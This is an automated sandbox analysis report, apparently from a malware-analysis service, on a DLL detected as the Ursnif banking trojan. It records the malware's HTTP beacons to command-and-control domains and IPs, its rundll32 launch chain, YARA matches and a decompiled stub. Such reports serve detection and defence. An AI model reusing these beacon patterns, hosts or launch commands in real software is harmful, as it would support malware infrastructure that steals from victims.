6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49825	181.129.180.251	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2022 17:05:55.173449993 CET	18600	OUT	GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: giporedtrip.at
Jan 26, 2022 17:05:56.107831001 CET	18601	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:05:55 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49827	61.36.14.230	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2022 17:06:16.920280933 CET	18609	OUT	GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: habpfans.at
Jan 26, 2022 17:06:18.136353016 CET	18610	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:06:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.5	49828	31.214.157.187	80	C:\Windows\System32\loaddll32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 26, 2022 17:06:38.188649893 CET	18611	OUT	GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 31.214.157.187
Jan 26, 2022 17:06:38.456873894 CET	18611	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 26 Jan 2022 16:06:38 GMT Content-Type: text/html; charset=utf-8 Content-Length: 548 Connection: keep-alive Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 988, Parent PID: 1336

General

Target ID:	0
Start time:	17:03:03
Start date:	26/01/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll"
Imagebase:	0x8b0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5904, Parent PID: 988

General

Target ID:	1
Start time:	17:03:04
Start date:	26/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 3272, Parent PID: 5904

General

Target ID:	3
Start time:	17:03:04
Start date:	26/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
Imagebase:	0x1360000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4496, Parent PID: 3272

General

Target ID:	7
Start time:	17:03:07
Start date:	26/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
Imagebase:	0x930000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: loaddll32.exePID: 988, Parent PID: 1336COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	12.2%
Total number of Nodes:	329
Total number of Limit Nodes:	9

Executed Functions

Function 0076B448 Relevance: 312.8, APIs: 172, Strings: 6, Instructions: 1255
librarymemorywindowCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {

				E0070615C(0x76b028);
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				LoadLibraryA("fadfadfadad"); // executed
				if (LoadIconA(0, 0x113c) != 0) goto 0x76bdf0;
			}

0x0076b454
0x0076b45e
0x0076b468
0x0076b472
0x0076b47c
0x0076b486
0x0076b490
0x0076b49a
0x0076b4a4
0x0076b4ae
0x0076b4b8
0x0076b4c2
0x0076b4cc
0x0076b4d6
0x0076b4e0
0x0076b4ea
0x0076b4f4
0x0076b4fe
0x0076b508
0x0076b512
0x0076b51c
0x0076b526
0x0076b530
0x0076b53a
0x0076b544
0x0076b54e
0x0076b558
0x0076b562
0x0076b56c
0x0076b576
0x0076b580
0x0076b58a
0x0076b594
0x0076b59e
0x0076b5a8
0x0076b5b2
0x0076b5bc
0x0076b5c6
0x0076b5d0
0x0076b5da
0x0076b5e4
0x0076b5ee
0x0076b5f8
0x0076b602
0x0076b60c
0x0076b616
0x0076b620
0x0076b62a
0x0076b634
0x0076b63e
0x0076b648
0x0076b652
0x0076b65c
0x0076b666
0x0076b670
0x0076b67a
0x0076b684
0x0076b68e
0x0076b698
0x0076b6a2
0x0076b6ac
0x0076b6b6
0x0076b6c0
0x0076b6ca
0x0076b6d4
0x0076b6de
0x0076b6e8
0x0076b6f2
0x0076b6fc
0x0076b706
0x0076b710
0x0076b71a
0x0076b724
0x0076b72e
0x0076b738
0x0076b742
0x0076b74c
0x0076b756
0x0076b760
0x0076b76a
0x0076b774
0x0076b77e
0x0076b788
0x0076b792
0x0076b79c
0x0076b7a6
0x0076b7b0
0x0076b7ba
0x0076b7c4
0x0076b7ce
0x0076b7d8
0x0076b7e2
0x0076b7ec
0x0076b7f6
0x0076b800
0x0076b80a
0x0076b814
